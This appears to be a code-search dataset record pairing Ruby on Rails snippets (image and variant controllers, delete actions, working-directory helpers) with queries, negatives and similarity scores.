"def set_viewable\n viewable_id = params[:image][:viewable_id]\n\n if viewable_id.is_a?(Hash)\n @product.errors.add(:attachment, 'Erro')\n option_values_array = viewable_id.map {|option_type, option_values| option_values.map(&:to_i) }\n option_values_combinations = option_values_array.shift\n option_values_array.each do |option_value|\n option_values_combinations = option_values_combinations.product(option_value)\n end\n option_values_combinations = option_values_combinations.map(&:flatten) if option_values_combinations.count > 1\n\n @product.variants.each do |variant|\n option_values_combinations.each do |ov_combination|\n variant_option_ids = variant.option_values.pluck(:id)\n\n if ([ov_combination].flatten - variant_option_ids).empty?\n create_image(variant, permitted_resource_params)\n end\n end\n end\n else\n viewable_id = params[:master_option] if params[:master_option]\n @image.viewable_type = 'Spree::Variant'\n @image.viewable_id = viewable_id\n end\n end",
"def put_storage(request, params)\n xmldoc = XMLElement.build_xml(request.body, 'STORAGE')\n image_info = XMLElement.new(xmldoc) if xmldoc != nil\n\n image = ImageOCCI.new(\n Image.build_xml(params[:id]),\n @client)\n\n rc = nil\n if image_info['PERSISTENT'] && image_info['PUBLIC']\n error_msg = \"It is not allowed more than one change per request\"\n return OpenNebula::Error.new(error_msg), 400\n elsif image_info['PERSISTENT'] == 'YES'\n rc = image.persistent\n elsif image_info['PERSISTENT'] == 'NO'\n rc = image.nonpersistent\n elsif image_info['PUBLIC'] == 'YES'\n rc = image.publish\n elsif image_info['PUBLIC'] == 'NO'\n rc = image.unpublish\n end\n\n if OpenNebula.is_error?(rc)\n return rc, CloudServer::HTTP_ERROR_CODE[rc.errno]\n end\n\n # --- Prepare XML Response ---\n image.info\n return to_occi_xml(image, :code=>202)\n end",
"def update\n respond_to do |format|\n if @gallery.update(gallery_params)\n if params[:images]\n params[:images].each { |image|\n pic = @gallery.pics.create(image: image)\n data = Cloudinary::Uploader.upload(image,@auth)\n pic.public_id = data['secure_url']\n pic.image_file_size = data['bytes']\n pic.save\n }\n end\n format.html { redirect_to @gallery, notice: 'Gallery was successfully updated.' }\n format.json { render :show, status: :ok, location: @gallery }\n else\n format.html { render :edit }\n format.json { render json: @gallery.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @electriccar.update(electriccar_params)\n if params[:images]\n @electriccar.gallery ||= Gallery.new\n params[:images].each do |image|\n @electriccar.gallery.images.create(image: image)\n end\n unless @electriccar.image_file_size\n @electriccar.update(image: @electriccar.gallery.images.first.image)\n end\n end\n format.html { redirect_to @electriccar, notice: 'Electriccar was successfully updated.' }\n format.json { render :show, status: :ok, location: @electriccar }\n else\n format.html { render :edit }\n format.json { render json: @electriccar.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n unless params[:image][:tags].nil?\n @image.tag_with params[:image]['tags']\n params[:image].delete(\"tags\")\n end\n respond_to do |format|\n if @image.update_attributes(params[:image])\n flash[:notice] = 'Image was successfully updated.'\n format.html { redirect_to([:admin, @image]) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @image.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def get_variant\n @product = Spree::Product.find_by :slug => params[:product_id]\n @variant = @product.find_variant_by_options(params[:ids].split(','))\n if @variant\n respond_to do |format|\n format.json {render json: {variant_id: @variant.id, image_ids: @variant.image_ids}}\n end\n end\n end",
"def variant_params\n params.require(:variant).permit(:sku, :product_id, :position, :price, :variant_price, option_value_ids: [], assets_attributes: [:id, :image, :_destroy])\n end",
"def update\n if @experience.update(experience_params)\n\n if params[:images] \n params[:images].each do |image|\n @experience.photos.create(image: image)\n end\n end\n\n redirect_to edit_trip_experience_path(@trip,@experience), notice: \"Updated...\"\n else\n render :edit\n end\n end",
"def update\r\n respond_to do |format|\r\n if @image.update(image_params)\r\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\r\n format.json { render :show, status: :ok, location: @image }\r\n else\r\n format.html { render :edit }\r\n format.json { render json: @image.errors, status: :unprocessable_entity }\r\n end\r\n end\r\n end",
"def image hash = {}\n hash = { :id => hash} if hash.is_a? String\n home hash.update :action => 'image', :trailing_slash => false\n end",
"def set_animal_image\n @animal_image = AnimalImage.find(params[:id])\n end",
"def update\n if(@check)\n @evento.update(event_params.except(:token))\n if @evento.save\n #first we delete all the current images if there are\n if params[:event_image_data]\n @evento.event_images.each do |image|\n image.destroy\n end\n #then we will create new ones\n params[:event_image_data].each do |file|\n @evento.event_images.create!(:image => file)\n end\n end\n render json: @evento, status: :ok, location: @evento\n else\n render json: @evento.errors, status: :unprocessable_entity\n end\n end\n end",
"def update\n respond_to do |format|\n data = snarf_image_data\n if @beverage.update(beverage_params)\n if data\n STDERR.puts \"UPDATING DATA\"\n @beverage.image_data = Base64.encode64(data)\n @beverage.save\n end\n if mid = motor_id_param\n new_motor = Motor.find(mid)\n pp new_motor.id\n pp new_motor.uuid\n @beverage.motor = new_motor if new_motor\n @beverage.save\n end\n\n format.html { redirect_to @beverage, notice: \"Beverage was successfully updated.\" }\n format.json { render :show, status: :ok, location: @beverage }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @beverage.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.685779",
"0.6613139",
"0.65422946",
"0.65422946",
"0.64632577",
"0.6349292",
"0.62428784",
"0.62285197",
"0.6191053",
"0.61872923",
"0.6173035",
"0.6151853",
"0.6150835",
"0.6141934",
"0.61195475",
"0.61183",
"0.6104693",
"0.6087452",
"0.60852027",
"0.6080466",
"0.60675687",
"0.6066172",
"0.60491836",
"0.6022617",
"0.60159135",
"0.6006063",
"0.5999727",
"0.5990983",
"0.59825796",
"0.5961401",
"0.59580576",
"0.5957686",
"0.59568673",
"0.59408176",
"0.59352076",
"0.5935033",
"0.5932905",
"0.5931821",
"0.59245956",
"0.5923135",
"0.5906676",
"0.58827114",
"0.58771574",
"0.5872752",
"0.58700234",
"0.585377",
"0.5841477",
"0.5838754",
"0.5838754",
"0.5838754",
"0.5838754",
"0.58343416",
"0.5832484",
"0.58251715",
"0.58203804",
"0.58129454",
"0.58116454",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.580268",
"0.5794688",
"0.5792371",
"0.5790557",
"0.5787037",
"0.57864785",
"0.57861483",
"0.57853246",
"0.57832724",
"0.578255",
"0.57716775",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.576799",
"0.5762669",
"0.57502276",
"0.57443845",
"0.5744122",
"0.57425416",
"0.57365793",
"0.5734688",
"0.5728777",
"0.5726281",
"0.57161516",
"0.5714995",
"0.5713288",
"0.57071596",
"0.56995374",
"0.5694955"
] | 0.7366369 | 0 |
DELETE /variant_images/1 DELETE /variant_images/1.json | def destroy
@variant_image = VariantImage.find(params[:id])
@variant = @variant_image.variant
@variant_image.destroy
respond_to do |format|
format.html { redirect_to @variant.product }
format.json { head :ok }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def destroy\n #Finds selected image\n @image = Image.find(params[:id])\n #destroy image\n @image.destroy\n respond_to do |format|\n format.html { redirect_to '/admin' }\n format.json { head :ok }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n render json: {status: \"success\"}, status: :ok\n end",
"def destroy\n @image.destroy\n\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n @estate_agent_image.destroy\n\n respond_to do |format|\n format.html { redirect_to estate_agent_image_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to(images_url) }\n format.json { head :ok }\n end\n end",
"def delete\n item = FormImage.last\n id = item[:id]\n item.destroy\n render json: {id: id}\n end",
"def destroy\n @variant.destroy\n respond_to do |format|\n format.html { redirect_to edit_admin_good_url(@variant.good, anchor: \"variants\") }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n \n imagen = @image.filename\n \n #function in manage_images.rb\n remove_image_file(imagen)\n \n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @vmimage.destroy\n respond_to do |format|\n format.html { redirect_to vmimages_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @imagedemo.destroy\n respond_to do |format|\n format.html { redirect_to imagedemos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @sample_photo.destroy\n render json: {message: 'Foto Excluida'} , status: :ok\n end",
"def destroy\n request(:delete, \"/computing/image/#{uuid}\")\n true\n end",
"def deleteEntityImage( entity_id, gen_id)\n params = Hash.new\n params['entity_id'] = entity_id\n params['gen_id'] = gen_id\n return doCurl(\"delete\",\"/entity/image\",params)\n end",
"def destroy\n id = @taxi_image.taxi_sevice_id\n @taxi_image.destroy\n respond_to do |format|\n format.html { redirect_to \"/taxi_sevices/\" + id.to_s, notice: 'Taxi image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_to_sample.destroy\n respond_to do |format|\n format.html { redirect_to image_to_samples_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @s3_image = S3Image.find(params[:id])\n @s3_image.destroy\n\n respond_to do |format|\n format.html { redirect_to s3_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n ImagesIndex.delete params[:id]\n respond_to do |format|\n format.html { redirect_to(\"/images_indices\") }\n format.xml { head :ok }\n end\n end",
"def destroy\n @banner_img = BannerImg.find(params[:id])\n @banner_img.destroy\n\n respond_to do |format|\n format.html { redirect_to banner_imgs_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n Image.find(params[:id]).destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @animal_image.destroy\n respond_to do |format|\n format.html\n format.js {}\n format.json { render json: { ok: true } }\n end\n end",
"def destroy\n @photo = Photo.find(params[:id])\n\n # Destroy s3 objects\n aws_s3_delete(@photo.key)\n Sebitmin::Application.config.thumbnail_sizes.each do |thumbnail_size|\n aws_s3_delete(@photo[\"thumbnail_key_#{thumbnail_size}\"])\n end\n\n @photo.destroy\n\n respond_to do |format|\n format.html { redirect_to \"/\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_upload = ImageUpload.find(params[:id])\n @image_upload.destroy\n\n respond_to do |format|\n format.html { redirect_to image_uploads_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was deleted successfully.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_section = ImageSection.find(params[:id])\n @image_section.destroy\n\n respond_to do |format|\n format.html { redirect_to image_sections_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @bgimage = Bgimage.find(params[:id])\n @bgimage.destroy\n\n respond_to do |format|\n format.html { redirect_to bgimages_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @item.image.destroy\n @item.destroy\n respond_to do |format|\n format.html { redirect_to items_url, notice: 'Item was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @setup_image.destroy\n respond_to do |format|\n format.html { redirect_to :back }\n format.json { head :no_content }\n end\n end",
"def destroy\n @recipe_image.destroy\n respond_to do |format|\n format.html { redirect_to recipe_images_url, notice: 'Recipe image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n compute.delete_flavor(params[:id])\n \n\n respond_to do |format|\n format.html { redirect_to flavors_path }\n format.json { head :ok }\n end\n end",
"def destroy\n ApiAction.new.destroy_image(@logo.uuid_image)\n @logo.destroy\n respond_to do |format|\n format.html { redirect_to campaign_path(@logo.campaign), notice: 'Logo was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @loc_image.destroy\n respond_to do |format|\n format.html { redirect_to loc_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @photo = Photo.find(params[:id])\n File.delete(Rails.root.join(\"app\",'assets','images',@photo.path))\n @photo.destroy\n\n respond_to do |format|\n format.html { redirect_to photos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n file_url = @image.url\n @image.destroy\n\n File.delete(\"public/uploads/#{file_url}\")\n\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @img.destroy\n respond_to do |format|\n format.html { redirect_to imgs_url, notice: \"Img was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @img = Img.find(params[:id])\n @img.destroy\n\n respond_to do |format|\n format.html { redirect_to(imgs_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @variant = Variant.find(params[:id])\n @variant.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_product_variants_url(@variant.master_id) }\n format.json { head :no_content }\n end\n end",
"def destroy\n @featureimg.destroy\n respond_to do |format|\n format.html { redirect_to featureimgs_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @motivational_image = MotivationalImage.find(params[:id])\n @motivational_image.destroy\n\n respond_to do |format|\n format.html { redirect_to motivational_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image_url = ImageUrl.find(params[:id])\n @image_url.destroy\n\n respond_to do |format|\n format.html { redirect_to image_urls_url }\n format.json { head :no_content }\n end\n end",
"def delete_storage(request, params)\n # --- Get the Image ---\n image = ImageOCCI.new(\n Image.build_xml(params[:id]),\n @client)\n\n # --- Delete the Image ---\n rc = image.delete\n if OpenNebula.is_error?(rc)\n return rc, CloudServer::HTTP_ERROR_CODE[rc.errno]\n end\n\n return \"\", 204\n end",
"def destroy\n @variant.destroy\n respond_to do |format|\n format.html { redirect_to admin_product_variants_url(@product) }\n format.json { head :no_content }\n end\n end",
"def destroy\n @match_image = MatchImage.find(params[:id])\n @match_image.destroy\n\n respond_to do |format|\n format.html { redirect_to match_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n redirect_to console_images_path\n end",
"def destroy\n @slider_image = SliderImage.find(params[:id])\n @slider_image.destroy\n\n respond_to do |format|\n format.html { redirect_to slider_images_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @slider_image = SliderImage.find(params[:id])\n @slider_image.destroy\n\n respond_to do |format|\n format.html { redirect_to slider_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @property_image = PropertyImage.find(params[:id])\n @property_image.destroy\n\n respond_to do |format|\n format.html { redirect_to property_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete_aos_version(args = {}) \n delete(\"/aosversions.json/#{args[:aosVersionId]}\", args)\nend",
"def destroy\n image = Image.find(params[:id])\n if image.user_id == current_user.id\n image.destroy\n render json:{}, status:201\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: \"Image was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n #If image has parent, update children and vice versa\n if image.root_version? then\n newroot = image.child_versions.order(:created_at).last\n image.child_versions.delete(newroot)\n image.child_versions.each do |v| v.parent_image = newroot and v.save end\n else\n image.child_versions.each do |v| v.parent_image = image.parent_image and v.save end\n end\n\n image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @s3image.destroy\n respond_to do |format|\n format.html { redirect_to s3images_url, notice: 'S3image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @structure_photo.destroy\n render json: {message: 'Foto Excluida'} , status: :ok\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n head :no_content\n end",
"def destroy\n @image_path = ImagePath.find(params[:id])\n @image_path.destroy\n\n respond_to do |format|\n format.html { redirect_to(image_paths_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @showcase = Showcase.find(params[:showcase_id])\n @showcase_image = ShowcaseImage.find(params[:id])\n @showcase_image.destroy\n\n respond_to do |format|\n format.html { redirect_to edit_showcase_path(@showcase) }\n format.xml { head :ok }\n end\n end",
"def image_destroy\n result = RestaurantManage.image_destroy(@restaurant, params[:pic_id])\n get_restaurant()\n render json: result\n end",
"def destroy\n @image = Image.find(params[:id])\n checkaccountobject(\"images\",@image)\n cloud = Oecloud.new(:zone => @image.zone, :image => @image)\n if cloud.deregisterimage\n @image.destroy\n end\n\n respond_to do |format|\n format.html { redirect_to images_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html { redirect_to root_path, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy()\n respond_to do |format|\n format.html { redirect_to images_url, notice: \"Image was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def delete_image(image_id)\n delete(\"cloud-instances/#{guid}/images/#{image_id}\")\n end",
"def destroy\n @image.tags.destroy_all\n @image.destroy\n respond_to do |format|\n format.html { redirect_to images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @gallery = Gallery.find(params[:id])\n\n begin\n AWS::S3::S3Object.find(@gallery.thumbnail, @@BUCKET).delete\n rescue Exception=>e\n # handle e\n end\n \n @gallery.destroy\n\n respond_to do |format|\n format.html { redirect_to galleries_url }\n format.json { head :no_content }\n end\n end",
"def delete_image(id)\n uri = URI.parse(\"http://\" + @location.host + \":\" + @location.port.to_s + \"/v2/images/\" + id)\n return delete_request(uri, @token)\n end",
"def destroy\n @photo.destroy\n respond_to do |format|\n format.html { redirect_to uploads_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image.destroy\n respond_to do |format|\n format.html {redirect_to admin_path, notice: 'Image was successfully destroyed.'}\n format.json {head :no_content}\n end\n end",
"def destroy\n @image = Image.find(params[:id])\n @image.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_images_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @admin_image.destroy\n respond_to do |format|\n format.html { redirect_to admin_images_url, notice: 'Image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @image = Gui::Image.find(params[:id])\n @image.destroy\n redirect_to gui_panels_path\n\n # respond_to do |format|\n # format.html { redirect_to gui_images_url }\n # format.json { head :no_content }\n # end\n end",
"def destroy\n @bwimage = Bwimage.find(params[:id])\n @bwimage.destroy\n\n respond_to do |format|\n format.html { redirect_to bwimages_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @objective_image.destroy\n respond_to do |format|\n format.html { redirect_to objective_images_url, notice: 'Objective image was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @review_image = ReviewImage.find(params[:id])\n @review_image.destroy\n\n respond_to do |format|\n format.html { redirect_to review_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @story_image.destroy\n respond_to do |format|\n format.html { redirect_to story_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @slide_image = SlideImage.find(params[:id])\n @slide_image.destroy\n\n respond_to do |format|\n format.html { redirect_to slide_images_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @pet_image_repo.destroy\n respond_to do |format|\n format.html { redirect_to :back, notice: 'Image was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n output = \"oneimage delete #{resource[:name]} \", self.class.login\n `#{output}`\n end"
] | [
"0.71142924",
"0.7108093",
"0.7081805",
"0.7033761",
"0.6999009",
"0.69973284",
"0.69886255",
"0.6982736",
"0.69627947",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6953001",
"0.6943084",
"0.691388",
"0.69135904",
"0.69056183",
"0.68884355",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.688669",
"0.687497",
"0.6874781",
"0.6857338",
"0.6856384",
"0.6850554",
"0.68480664",
"0.6832379",
"0.68316185",
"0.68296874",
"0.6820716",
"0.6820041",
"0.6812784",
"0.6812442",
"0.6811517",
"0.6810214",
"0.6804466",
"0.6799503",
"0.6794745",
"0.67917854",
"0.6790163",
"0.678389",
"0.6775989",
"0.6774402",
"0.6763649",
"0.6758626",
"0.6752807",
"0.6745241",
"0.67448676",
"0.6741558",
"0.6739329",
"0.6735025",
"0.6729443",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.6720031",
"0.671985",
"0.6715861",
"0.67150056",
"0.670962",
"0.67094177",
"0.6706716",
"0.67064625",
"0.670524",
"0.6702187",
"0.6691352",
"0.6690678",
"0.66896194",
"0.66856056",
"0.66855824",
"0.66841817",
"0.66714644",
"0.6668055",
"0.6664831",
"0.6663",
"0.6662593",
"0.6660426",
"0.666021",
"0.6659048",
"0.66548276",
"0.66535854",
"0.6651084",
"0.66509116",
"0.6647134",
"0.6645403"
] | 0.76444316 | 0 |
Return an absolute path within the working directory. The working directory is determined: value of BREWED_WORKING_DIR env var When run_mode is :daemon, the working dir is state_dir. Otherwise, the current directory. | def working_dir(*path)
if _working_dir.nil?
@_working_dir = ENV['PROJECT_WORKING_DIR']
if _working_dir != nil
@_working_dir = Pathname.new(expand_variables _working_dir)
Dir.chdir _working_dir.to_s
elsif run_mode == :daemon
@_working_dir = state_dir
Dir.chdir _working_dir.to_s
else
@_working_dir = Pathname.getwd
end
raise "working_dir not a directory: #{_working_dir.safe_s}" unless _working_dir.directory?
end
[_working_dir, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def working_dir\n ENV['PWD'] || Dir.pwd\n end",
"def working_dir\n @_working_dir ||= File.expand_path(options['merb-root'] || Dir.pwd)\n end",
"def working_dir\n @_working_dir ||= File.expand_path(options['merb-root'] || Dir.pwd)\n end",
"def working_dir\n @_working_dir ||= File.expand_path(options['merb-root'] || Dir.pwd)\n end",
"def working_directory\n @options[:working_directory]\n end",
"def dir\n @working_directory\n end",
"def getWorkingDir\n if(@workingDir != nil)\n return @workingDir\n end\n currDir = Dir.pwd\n dr = \"\"\n currDir.split(\"/\").each{ |entry|\n dr = dr+entry+\"/\"\n #puts dr\n if(File.directory? dr+\".hoster\")\n @workingDir = dr+\".hoster\"\n end\n }\n @workingDir\n end",
"def getWorkingDir\n currDir = Dir.pwd\n dr = \"\"\n currDir.split(\"/\").each{ |entry|\n dr = dr+entry+\"/\"\n #puts dr\n if(File.directory? dr+\".hoster\")\n @workingDir = dr+\".hoster\"\n end\n }\n @workingDir\n end",
"def working_dir\n return nil if !repo || !user\n return \"#{Bini.data_dir}/repos/#{user}/#{repo}\"\n end",
"def working_directory\n @link.WorkingDirectory\n end",
"def current_working_directory; @rye_current_working_directory; end",
"def working_dir(&block)\n return Dir.chdir(@working_dir, &block) if block_given?\n @working_dir\n end",
"def work_dir; end",
"def prefixed_working_directory\n return self.storage.prefixed_working_directory\n end",
"def cwd\n return cd(\"\").to_s\n end",
"def [](fpath=nil)\n if fpath.nil? || fpath.index('/') == 0\n @rye_current_working_directory = fpath\n else\n # Append to non-absolute paths\n if @rye_current_working_directory\n newpath = File.join(@rye_current_working_directory, fpath)\n @rye_current_working_directory = newpath\n else\n @rye_current_working_directory = fpath\n end\n end\n debug \"CWD: #{@rye_current_working_directory}\"\n self\n end",
"def work\n '/' + File.dirname(file)\n end",
"def cwd\n @cwd ||= begin\n exec! 'pwd'\n rescue => e\n raise e\n '/'\n end\n end",
"def workdir\n @workdir ||= ::File.join(::File.dirname(@repo_dir), 'download')\n end",
"def run_dir\n result = File.join(osw_dir, 'run')\n if @workflow_json\n begin\n result = @workflow_json.absoluteRunDir.to_s\n rescue StandardError\n end\n end\n result\n end",
"def run_dir\n result = File.join(osw_dir, 'run')\n if @workflow_json\n begin\n result = @workflow_json.absoluteRunDir.to_s\n rescue StandardError\n end\n end\n result\n end",
"def working_directory\n if @working_directory.nil?\n raise \"`working_directory` for the current storage provider is `nil` as the `#download` method was never called\"\n end\n return @working_directory\n end",
"def guess_working_path\n unless File.directory?(File.join(Dir.pwd, '.git'))\n raise \"Current working directory doesn't seem to be a Git working directory.\"\n end\n Dir.pwd\nend",
"def cwd(pid)\n\tFile.readlink(\"/proc/#{pid}/cwd\")\nend",
"def work_dir\n # The directory is not stored in a variable so it can be overridden\n # in specs.\n File.join(base_dir, \"ruby-#{RUBY_VERSION}\", \"rbs-#{RBS::VERSION}\", \"solargraph-#{Solargraph::VERSION}\")\n end",
"def work_path\n @work_path ||= tmp_path.join(name)\n end",
"def working_file(file)\n \"#{working_dir}/#{file_string(file)}\"\n end",
"def cwd\n @target.is_a?(String) && File.directory?(@target) ? @target : \"./\"\n end",
"def exec_env_directory\n filename.dirname.to_s\n end",
"def get_pwd\n env_stat = File.stat(ENV['PWD'])\n pwd_stat = File.stat(Dir.pwd)\n if env_stat.ino == pwd_stat.ino && env_stat.dev == pwd_stat.dev\n ENV['PWD']\n else\n Dir.pwd\n end\n end",
"def base_path\n @base_path ||= Dir.pwd\n end",
"def getwd\n Dir.getwd\n end",
"def work_dir\n AYTests.work_dir\n end",
"def current_dir; end",
"def integration_cwd\n root.to_s\n end",
"def current_dir\n File.dirname(file_path)\n end",
"def curr_srcdir\n \"#{srcdir_root()}/#{relpath()}\"\n end",
"def curr_srcdir\n \"#{srcdir_root()}/#{relpath()}\"\n end",
"def event_state_dir(state_dir = nil)\n if ENV['WF_EVENT_STATE_DIR']\n Pathname.new(ENV['WF_EVENT_STATE_DIR'])\n elsif state_dir.nil?\n EVENT_STATE_DIR\n else\n Pathname.new(state_dir)\n end\n end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def workdir\n result = base.join('cache')\n result.mkpath\n result\n end",
"def curr_srcdir\n \"#{srcdir_root()}/#{relpath()}\"\n end",
"def current_directory\n File.expand_path @current_directory\n end",
"def cwd\n Dir.getwd\n end",
"def target_dir\n return @target_dir ? @target_dir : Dir.home\n end",
"def containing_directory\n path.dirname\n end",
"def basedir\n return nil if !file\n File.dirname File.absolute_path @file\n end",
